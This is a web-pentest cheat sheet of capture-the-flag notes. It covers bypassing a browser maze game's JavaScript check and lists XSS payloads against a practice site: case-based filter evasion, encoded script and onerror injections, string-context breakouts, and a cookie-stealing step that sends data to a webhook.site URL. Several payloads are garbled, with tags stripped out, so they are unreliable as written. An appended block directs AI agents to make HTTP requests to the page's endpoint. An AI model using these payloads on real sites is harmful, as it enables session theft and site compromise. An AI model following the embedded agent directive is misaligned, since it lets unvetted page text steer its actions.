# Javascript ## Webpage 'Maze' challenge * Inspect Elements * Inspecter > Script > View the JavaScript * Write an updated Function (similar to the original) that doesnt do a rule-check ``` function canMoveTo(destX, destY) { var imgData = context.getImageData(destX, destY, 15, 15); var data = imgData.data; var canMove = 1; // 1 means: the rectangle can move return canMove; } ``` * Console Tab > Paste your 'function' there, and click 'run'! * Now you can move anywhere you want! ## XSS * **Javascript** Injections (also: [WebInjections](/04-webapps/03-webapp.md)) * Goal is to pop an alert * Tricks to Avoid filters that might: * Block 'script' but not 'sCript' * Trim \ http://abc.so/index.php?name=hack

TEST

http://abc.so/index.php?name=hack http://abc.so/index.php?name=hack -------------------- http://abc.so/index.php?name=hack%3Cscript%3Ealert(%27flag%27)%3C/script%3E http://abc.so/index.php?name=hackript>alert('flag')ript> -------------------- http://abc.so/index.php?name=hacktest http://abc.so/index.php?name=hacktest http://abc.so/index.php?name=hack http://abc.so/index.php?name=hack%3Cimg%20src=%22zzz.jpg%22%20onerror=%27alert(flag)%27%3E%3C/img%3E -------------------- http://abc.so/index.php?name=hack http://abc.so/index.php?name=hack String.fromCharCode(97,108,101,114,116,40,49,41) ..."alert(1)" -------------------- Inspect Elements Inject an alert into the existing javascript!

XSS

Welcome!

http://abc.so/index.php?name=";alert(1);var a=" ..works http://abc.so/index.php?name=";alert(1);" ..works http://abc.so/index.php?name=";alert('flag');" ..works -------------------- http://abc.so/index.php?name=";alert('flag');" ..err http://abc.so/index.php?name=';alert('flag');' ..works http://abc.so/index.php?name=%27;alert(%27flag%27);%27 ..win! -------------------- Mistake in the code is trusting index.php So we send index.php/somethingelse .. at the end, to fire a script! http://abc.so/index.php/hello"> http://abc.so/index.php/hello%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://abcl.so/index.php/hello"> http://abc.so/index.php# -------------------- Cookie Grab Flag http://abc.so/index.php?name=hack http://abc.so/index.php?name= ..ok ..want this cookie http://abc.so/index.php?name= http://abc.so/index.php?name= http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff?c=SECRET%3flag ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/04-webapps/03-webapp-javascript.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.